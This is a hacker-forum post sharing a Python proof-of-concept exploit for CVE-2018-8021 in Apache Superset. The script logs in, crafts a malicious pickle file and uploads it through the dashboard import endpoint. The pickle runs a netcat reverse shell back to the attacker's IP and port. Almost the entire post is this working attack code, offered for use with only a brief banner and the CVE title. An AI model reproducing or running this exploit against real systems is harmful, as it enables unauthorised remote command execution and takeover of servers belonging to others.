CVE-2018-8021

POC CVE-2018-8021

Shacker已验证会员

黑客倉庫站長

贡献: 21%
JavaScript:
'''_____________________________________________________________________
|[] SHELL                                                      |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY)                                          | |
|EMAIL > [email protected]                                   | |
|Original PoC by David May ([email protected])               | |
|_____________________________________________________________________|/|
'''

import sys
import os
from lxml import html
import requests
import argparse

headers_dict = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
        'DNT': '1',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }

def main() :
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True )
    parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True)
    parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True)
    parser.add_argument('-p', '--port', help='port', dest='port', required = True)
    parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True)
    parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True)
    args = parser.parse_args()
    
    # Script arguments
    args.port = args.port
    # Verify these URLs match your environment
    login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/'
    upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards'
    if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'):
        os.remove(str(args.ip)+'_'+str(args.port)+'.pickle')
    headers_dict = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
        'DNT': '1',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }
    evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+')
    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + args.ip + ' ' + args.port + ' 1>/tmp/backpipe\'\ntR.')
    evilPickle.close()
    try :
        session = requests.session()   
        login_page = session.get(login_URL)
        if login_page.status_code != 200:
            print('Login page not reached')
        login_tree = html.fromstring(login_page.content)
        token = login_tree.xpath('//input[@id="csrf_token"]/@value')
        
        login_data = {
            'token' : token,
            'username' : args.user,
            'password' : args.passw,
        }
        headers_dict['Referer'] = login_URL
        login = session.post(login_URL, headers=headers_dict, data=login_data)   
        upload_page = session.get(upload_URL)
        if upload_page.status_code != 200:
            print('Upload page not reached')
        upload_tree = html.fromstring(upload_page.content)
        token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
        headers_dict['Referer'] = upload_URL
        upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
        session.close()
        sys.exit()
    except requests.exceptions.ConnectionError :
        print('Connection Refused, Check The IP and PORT!!!')
    except Exception as e:
        print('Error :\n\n' , e)
        
    
if __name__ == "__main__" :
    main()
 
后退
顶部